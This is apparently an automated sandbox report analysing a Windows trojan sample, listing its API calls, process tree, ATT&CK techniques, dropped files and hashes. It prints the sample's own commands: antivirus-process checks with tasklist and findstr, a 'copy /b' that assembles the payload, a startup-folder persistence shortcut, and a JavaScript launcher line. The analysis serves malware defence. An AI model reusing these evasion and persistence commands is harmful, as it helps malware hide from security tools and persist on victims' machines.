Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pif | Code function: 11_2_002B494A GetFileAttributesW,FindFirstFileW,FindClose,11_2_002B494A
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pif | Code function: 11_2_002B3CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,11_2_002B3CE2
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pif | Code function: 11_2_002BC2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,11_2_002BC2FF
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pif | Code function: 11_2_002BCD14 FindFirstFileW,FindClose,11_2_002BCD14
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pif | Code function: 11_2_002BCD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,11_2_002BCD9F
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pif | Code function: 11_2_002BF5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,11_2_002BF5D8
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pif | Code function: 11_2_002BF735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,11_2_002BF735
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pif | Code function: 11_2_002BFA36 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,11_2_002BFA36
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scr | Code function: 17_2_00254005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,17_2_00254005
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scr | Code function: 17_2_0025494A GetFileAttributesW,FindFirstFileW,FindClose,17_2_0025494A
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scr | Code function: 17_2_0025C2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,17_2_0025C2FF
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scr | Code function: 17_2_0025CD14 FindFirstFileW,FindClose,17_2_0025CD14
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scr | Code function: 17_2_0025CD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,17_2_0025CD9F
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scr | Code function: 17_2_0025F5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,17_2_0025F5D8
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scr | Code function: 17_2_0025F735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,17_2_0025F735
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scr | Code function: 17_2_0025FA36 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,17_2_0025FA36
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scr | Code function: 17_2_00253CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,17_2_00253CE2
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pif | Code function: 11_2_00265D13 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,11_2_00265D13
Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\AppData\Local\Temp\
Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\AppData\Local\
Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\AppData\Local\Temp\704579\
Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\AppData\Local\Temp\704579
Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\AppData\
Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\
Source: InnoMesh.scr, 00000011.00000002.2554247186.0000000004147000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllu](
Source: Organizational.pif, 0000000B.00000002.2553979923.0000000003F12000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scr | API call chain: ExitProcess graph end node
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pif | Process information queried: ProcessInformation
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pif | Code function: 11_2_002C45D5 BlockInput,11_2_002C45D5
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pif | Code function: 11_2_00265240 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,11_2_00265240
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pif | Code function: 11_2_00285CAC EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,11_2_00285CAC
Source: C:\Users\user\Desktop\ldqj18tn.exe | Code function: 0_2_004062FC GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_004062FC
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pif | Code function: 11_2_002A88CD GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,11_2_002A88CD
Source: C:\Windows\SysWOW64\tasklist.exe | Process token adjusted: Debug
Source: C:\Windows\SysWOW64\tasklist.exe | Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pif | Code function: 11_2_0027A354 SetUnhandledExceptionFilter,11_2_0027A354
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pif | Code function: 11_2_0027A385 SetUnhandledExceptionFilter,UnhandledExceptionFilter,11_2_0027A385
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scr | Code function: 17_2_0021A354 SetUnhandledExceptionFilter,17_2_0021A354
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scr | Code function: 17_2_0021A385 SetUnhandledExceptionFilter,UnhandledExceptionFilter,17_2_0021A385
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pif | Code function: 11_2_002A9369 LogonUserW,11_2_002A9369
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pif | Code function: 11_2_00265240 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,11_2_00265240
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pif | Code function: 11_2_002B1AC6 SendInput,keybd_event,11_2_002B1AC6
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pif | Code function: 11_2_002B51E2 mouse_event,11_2_002B51E2
Source: C:\Users\user\Desktop\ldqj18tn.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Descending Descending.bat & Descending.bat
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa opssvc"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\findstr.exe findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 704579
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "MARTNMSPIDERRINGTONE" Mh
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Consequence + ..\Gently + ..\Situations + ..\International + ..\Jet + ..\Commodities + ..\Mood + ..\Fastest + ..\Estimate + ..\Jessica + ..\Prof + ..\Becoming + ..\Princess + ..\Required + ..\Traveller + ..\Against u
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\user\AppData\Local\Temp\704579\Organizational.pif Organizational.pif u
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5
Source: C:\Windows\System32\wscript.exe | Process created: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scr "C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scr" "C:\Users\user\AppData\Local\TechMesh Dynamics\M"
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pif | Process created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [internetshortcut] > "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\innomesh.url" & echo url="c:\users\user\appdata\local\techmesh dynamics\innomesh.js" >> "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\innomesh.url" & exit
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pif | Process created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [internetshortcut] > "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\innomesh.url" & echo url="c:\users\user\appdata\local\techmesh dynamics\innomesh.js" >> "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\innomesh.url" & exit
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pif | Code function: 11_2_002A88CD GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,11_2_002A88CD
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pif | Code function: 11_2_002B4F1C AllocateAndInitializeSid,CheckTokenMembership,FreeSid,11_2_002B4F1C
Source: ldqj18tn.exe, 00000000.00000003.1297854644.0000000002950000.00000004.00000020.00020000.00000000.sdmp, Organizational.pif, 0000000B.00000003.1355386865.000000000467F000.00000004.00000800.00020000.00000000.sdmp, Organizational.pif, 0000000B.00000000.1344740654.0000000000306000.00000002.00000001.01000000.00000006.sdmp | Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: Organizational.pif, InnoMesh.scr | Binary or memory string: Shell_TrayWnd
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pif | Code function: 11_2_0027885B cpuid 11_2_0027885B
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pif | Code function: 11_2_00290030 GetLocalTime,__swprintf,11_2_00290030
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pif | Code function: 11_2_00290722 GetUserNameW,11_2_00290722
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pif | Code function: 11_2_0028416A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,11_2_0028416A
Source: C:\Users\user\Desktop\ldqj18tn.exe | Code function: 0_2_00406805 GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW,0_2_00406805
Source: C:\Windows\System32\wscript.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: InnoMesh.scr | Binary or memory string: WIN_81
Source: InnoMesh.scr | Binary or memory string: WIN_XP
Source: InnoMesh.scr | Binary or memory string: WIN_XPe
Source: InnoMesh.scr | Binary or memory string: WIN_VISTA
Source: InnoMesh.scr | Binary or memory string: WIN_7
Source: InnoMesh.scr | Binary or memory string: WIN_8
Source: InnoMesh.scr.11.dr | Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 3USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pif | Code function: 11_2_002C696E socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,11_2_002C696E
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pif | Code function: 11_2_002C6E32 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,11_2_002C6E32
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scr | Code function: 17_2_0026696E socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,17_2_0026696E
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scr | Code function: 17_2_00266E32 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,17_2_00266E32
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity Information11
Scripting
2
Valid Accounts
1
Windows Management Instrumentation
11
Scripting
1
Exploitation for Privilege Escalation
1
Disable or Modify Tools
21
Input Capture
2
System Time Discovery
Remote Services1
Archive Collected Data
1
Ingress Tool Transfer
Exfiltration Over Other Network Medium1
System Shutdown/Reboot
CredentialsDomainsDefault Accounts2
Native API
1
DLL Side-Loading
1
DLL Side-Loading
1
Deobfuscate/Decode Files or Information
LSASS Memory1
Account Discovery
Remote Desktop Protocol21
Input Capture
1
Encrypted Channel
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain Accounts1
Command and Scripting Interpreter
2
Valid Accounts
2
Valid Accounts
2
Obfuscated Files or Information
Security Account Manager3
File and Directory Discovery
SMB/Windows Admin Shares3
Clipboard Data
1
Non-Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCron2
Registry Run Keys / Startup Folder
21
Access Token Manipulation
1
DLL Side-Loading
NTDS17
System Information Discovery
Distributed Component Object ModelInput Capture1
Application Layer Protocol
Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script12
Process Injection
111
Masquerading
LSA Secrets31
Security Software Discovery
SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts2
Registry Run Keys / Startup Folder
2
Valid Accounts
Cached Domain Credentials4
Process Discovery
VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items21
Access Token Manipulation
DCSync1
Application Window Discovery
Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job12
Process Injection
Proc Filesystem1
System Owner/User Discovery
Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
Behavior Graph ID: 1577511 | Sample: ldqj18tn.exe | Startdate: 18/12/2024 | Architecture: WINDOWS | Score: 84
DNS/IP: zaZEComvggHsSEuOVnvSMAnVIZblq.zaZEComvggHsSEuOVnvSMAnVIZblq
Signatures on the sample node: Multi AV Scanner detection for submitted file; Sigma detected: Search for Antivirus process; Sigma detected: Drops script at startup location; 2 other signatures
Process tree recovered from the behavior graph:
  ldqj18tn.exe (started): dropped C:\Users\user\AppData\Local\Temp\Becoming (DOS), C:\Users\user\AppData\Local\Temp\Traveller (data), C:\Users\user\AppData\Local\Temp\Situations (data), 13 other malicious files; Writes many files with high entropy
    cmd.exe (started): dropped C:\Users\user\AppData\...\Organizational.pif (PE32); Drops PE files with a suspicious file extension; Writes many files with high entropy
      Organizational.pif (started): dropped C:\Users\user\AppData\Local\...\InnoMesh.scr (PE32), C:\Users\user\AppData\Local\...\M (data), C:\Users\user\AppData\Local\...\InnoMesh.js (ASCII); Drops PE files with a suspicious file extension; Writes many files with high entropy
        cmd.exe (started): dropped C:\Users\user\AppData\...\InnoMesh.url (MS)
          conhost.exe (started)
      cmd.exe (started): dropped C:\Users\user\AppData\Local\Temp\704579\u (data)
      conhost.exe (started)
      7 other processes
  wscript.exe (started): Windows Scripting host queries suspicious COM object (likely to drop second stage)
    InnoMesh.scr (started)
Source | Detection | Scanner | Label
ldqj18tn.exe | 66% | ReversingLabs | Win32.Trojan.Leonem
Source | Detection | Scanner | Label
C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scr | 8% | ReversingLabs
C:\Users\user\AppData\Local\Temp\704579\Organizational.pif | 8% | ReversingLabs
C:\Users\user\AppData\Local\Temp\Becoming | 0% | ReversingLabs
No Antivirus matches
No Antivirus matches
No Antivirus matches
Name | IP | Active | Malicious | Antivirus Detection | Reputation
s-part-0035.t-0009.t-msedge.net | 13.107.246.63 | true | false | | high
zaZEComvggHsSEuOVnvSMAnVIZblq.zaZEComvggHsSEuOVnvSMAnVIZblq | unknown | unknown | false | | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
http://www.autoitscript.com/autoit3/J | ldqj18tn.exe, 00000000.00000003.1297854644.000000000295E000.00000004.00000020.00020000.00000000.sdmp, Organizational.pif, 0000000B.00000000.1344846466.0000000000319000.00000002.00000001.01000000.00000006.sdmp, Organizational.pif, 0000000B.00000003.1355251151.0000000003E2A000.00000004.00000800.00020000.00000000.sdmp, InnoMesh.scr, 00000011.00000002.2547902948.00000000002B9000.00000002.00000001.01000000.00000008.sdmp, Organizational.pif.2.dr, Volunteer.0.dr, InnoMesh.scr.11.dr | false | | high
http://nsis.sf.net/NSIS_ErrorError | ldqj18tn.exe | false | | high
https://www.autoitscript.com/autoit3/ | ldqj18tn.exe, 00000000.00000003.1297854644.000000000295E000.00000004.00000020.00020000.00000000.sdmp, Organizational.pif, 0000000B.00000002.2553979923.0000000003F12000.00000004.00000020.00020000.00000000.sdmp, Organizational.pif, 0000000B.00000003.1355251151.0000000003E2A000.00000004.00000800.00020000.00000000.sdmp, Organizational.pif.2.dr, Volunteer.0.dr, InnoMesh.scr.11.dr | false | | high
            No contacted IP infos
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1577511
Start date and time: 2024-12-18 14:41:49 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 7m 21s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed: 23
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: ldqj18tn.exe
Detection: MAL
Classification: mal84.rans.expl.evad.winEXE@28/26@2/0
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 102
• Number of non-executed functions: 300
Cookbook Comments:
• Found application associated with file extension: .exe
• Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
• Excluded IPs from analysis (whitelisted): 13.107.246.63, 4.245.163.56, 173.222.162.55
• Excluded domains from analysis (whitelisted): www.bing.com, slscr.update.microsoft.com, otelrules.azureedge.net, otelrules.afd.azureedge.net, ctldl.windowsupdate.com, azureedge-t-prod.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed, report is missing behavior information
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size exceeded maximum capacity and may have missing disassembly code.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Report size getting too big, too many NtSetInformationFile calls found.
• VT rate limit hit for: ldqj18tn.exe
Time | Type | Description
08:42:51 | API Interceptor | 3346x Sleep call for process: Organizational.pif modified
08:43:07 | API Interceptor | 2396x Sleep call for process: InnoMesh.scr modified
14:42:54 | Autostart | Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\InnoMesh.url
No context
Match | Associated Sample Name / URL | Detection | Threat Name | Context
s-part-0035.t-0009.t-msedge.net | DOC.exe | malicious | Cryptbot | 13.107.246.63
s-part-0035.t-0009.t-msedge.net | 2.png.ps1 | malicious | Unknown | 13.107.246.63
s-part-0035.t-0009.t-msedge.net | 1.png.ps1 | malicious | Unknown | 13.107.246.63
s-part-0035.t-0009.t-msedge.net | ko.ps1.2.ps1 | malicious | Unknown | 13.107.246.63
s-part-0035.t-0009.t-msedge.net | kjshdgacg18.bat | malicious | Abobus Obfuscator, Braodo | 13.107.246.63
s-part-0035.t-0009.t-msedge.net | steel.exe.2.exe | malicious | Socks5Systemz | 13.107.246.63
s-part-0035.t-0009.t-msedge.net | random.exe.17.exe | malicious | ScreenConnect Tool | 13.107.246.63
s-part-0035.t-0009.t-msedge.net | steel.exe.3.exe | malicious | Socks5Systemz | 13.107.246.63
s-part-0035.t-0009.t-msedge.net | newwork.exe.1.exe | malicious | Socks5Systemz | 13.107.246.63
s-part-0035.t-0009.t-msedge.net | IW9QNpidAN.exe | malicious | Unknown | 13.107.246.63
No context
No context
Match | Associated Sample Name / URL | Detection | Threat Name | Context
C:\Users\user\AppData\Local\Temp\704579\Organizational.pif | EO3RT0fEfb.exe | malicious | Unknown
C:\Users\user\AppData\Local\Temp\704579\Organizational.pif | RMBOriPHVJ.exe | malicious | Unknown
C:\Users\user\AppData\Local\Temp\704579\Organizational.pif | S6x3K8vzCA.exe | malicious | Unknown
C:\Users\user\AppData\Local\Temp\704579\Organizational.pif | PPbimZI4LV.exe | malicious | Unknown
C:\Users\user\AppData\Local\Temp\704579\Organizational.pif | l5VhEpwzJy.exe | malicious | Unknown
C:\Users\user\AppData\Local\Temp\704579\Organizational.pif | duyba.lnk.download.lnk | malicious | Unknown
C:\Users\user\AppData\Local\Temp\704579\Organizational.pif | pt8GJiNZDT.exe | malicious | Unknown
C:\Users\user\AppData\Local\Temp\704579\Organizational.pif | c2.hta | malicious | XWorm
C:\Users\user\AppData\Local\Temp\704579\Organizational.pif | c2.hta | malicious | XWorm
C:\Users\user\AppData\Local\Temp\704579\Organizational.pif | c2.hta | malicious | XWorm
C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scr | EO3RT0fEfb.exe | malicious | Unknown
C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scr | RMBOriPHVJ.exe | malicious | Unknown
C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scr | S6x3K8vzCA.exe | malicious | Unknown
C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scr | PPbimZI4LV.exe | malicious | Unknown
C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scr | l5VhEpwzJy.exe | malicious | Unknown
C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scr | duyba.lnk.download.lnk | malicious | Unknown
C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scr | pt8GJiNZDT.exe | malicious | Unknown
C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scr | c2.hta | malicious | XWorm
C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scr | c2.hta | malicious | XWorm
C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scr | c2.hta | malicious | XWorm
                                                    Process:C:\Users\user\AppData\Local\Temp\704579\Organizational.pif
                                                    File Type:ASCII text, with no line terminators
                                                    Category:dropped
                                                    Size (bytes):169
                                                    Entropy (8bit):4.717709271494144
                                                    Encrypted:false
                                                    SSDEEP:3:RiMIpGXIdPHo55wWAX+ZFk/iEkD5xAaUFJl2FZo5uWAX+ZFk/iEkD5xAaUFks:RiJBJHonwWDEnkDvxUFT2FywWDEnkDvU
                                                    MD5:034B9F8454315EE228D38BA208CD5E7A
                                                    SHA1:16681F9DF8D79108DDD7A5558CEC691E88F6C96B
                                                    SHA-256:C7C273802935E7FCA77E0983E58C1F96FD27CFD16DFB6F69EF76A8F4F6D1F047
                                                    SHA-512:5E3DDE199220DE1FF72CE94128E414EDC1DED1F70332537B1532D522D84DD289C5DBED897F83C4FED7FC67AE4DF30B718959D2A5F76130B266324E24FA0A6DDD
                                                    Malicious:true
                                                    Preview:new ActiveXObject("Wscript.Shell").Exec("\"C:\\Users\\user\\AppData\\Local\\TechMesh Dynamics\\InnoMesh.scr\" \"C:\\Users\\user\\AppData\\Local\\TechMesh Dynamics\\M\"")
                                                    Process:C:\Users\user\AppData\Local\Temp\704579\Organizational.pif
                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                    Category:dropped
                                                    Size (bytes):893608
                                                    Entropy (8bit):6.62028134425878
                                                    Encrypted:false
                                                    SSDEEP:12288:WpV0etV7qtINsegA/rMyyzlcqakvAfcN9b2MyZa31tqoPTdFbgawV2501:WTxz1JMyyzlohMf1tN70aw8501
                                                    MD5:18CE19B57F43CE0A5AF149C96AECC685
                                                    SHA1:1BD5CA29FC35FC8AC346F23B155337C5B28BBC36
                                                    SHA-256:D8B7C7178FBADBF169294E4F29DCE582F89A5CF372E9DA9215AA082330DC12FD
                                                    SHA-512:A0C58F04DFB49272A2B6F1E8CE3F541A030A6C7A09BB040E660FC4CD9892CA3AC39CF3D6754C125F7CD1987D1FCA01640A153519B4E2EB3E3B4B8C9DC1480558
                                                    Malicious:true
                                                    Antivirus:
                                                    • Antivirus: ReversingLabs, Detection: 8%
                                                    Joe Sandbox View:
                                                    • Filename: EO3RT0fEfb.exe, Detection: malicious
                                                    • Filename: RMBOriPHVJ.exe, Detection: malicious
                                                    • Filename: S6x3K8vzCA.exe, Detection: malicious
                                                    • Filename: PPbimZI4LV.exe, Detection: malicious
                                                    • Filename: l5VhEpwzJy.exe, Detection: malicious
                                                    • Filename: duyba.lnk.download.lnk, Detection: malicious
                                                    • Filename: pt8GJiNZDT.exe, Detection: malicious
                                                    • Filename: c2.hta, Detection: malicious
                                                    • Filename: c2.hta, Detection: malicious
                                                    • Filename: c2.hta, Detection: malicious
                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........sD.R.*.R.*.R.*..C..P.*....S.*._@..a.*._@....*._@..g.*.[j..[.*.[j..w.*.R.+.r.*......*....S.*._@..S.*.R...P.*....S.*.RichR.*.........................PE..L...._pZ.........."...............................@.......................................@...@.......@.........................|.......P....................p...q...;.............................. [..@............................................text............................... ..`.rdata..............................@..@.data...t........R..................@....rsrc...P............<..............@..@.reloc...q...p...r..................@..B................................................................................................................................................................................................................................................................................
                                                    Process:C:\Users\user\AppData\Local\Temp\704579\Organizational.pif
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):1177035
                                                    Entropy (8bit):7.999838432083651
                                                    Encrypted:true
                                                    SSDEEP:24576:uWgaEyFxeBEglui3XzLBMX2rgfXG5KXZCN277jTzsc:0yFxAVumMX2rgfSKXoN277vzd
                                                    MD5:AB0020D503E99E956AB92579E6690327
                                                    SHA1:9E3ACD23F62F72CCABDBBCBAF21C31986FD694EA
                                                    SHA-256:14A900791A0CF3D1A98491DC6E108EA1C814B41579F33851CF7A02460B9F9387
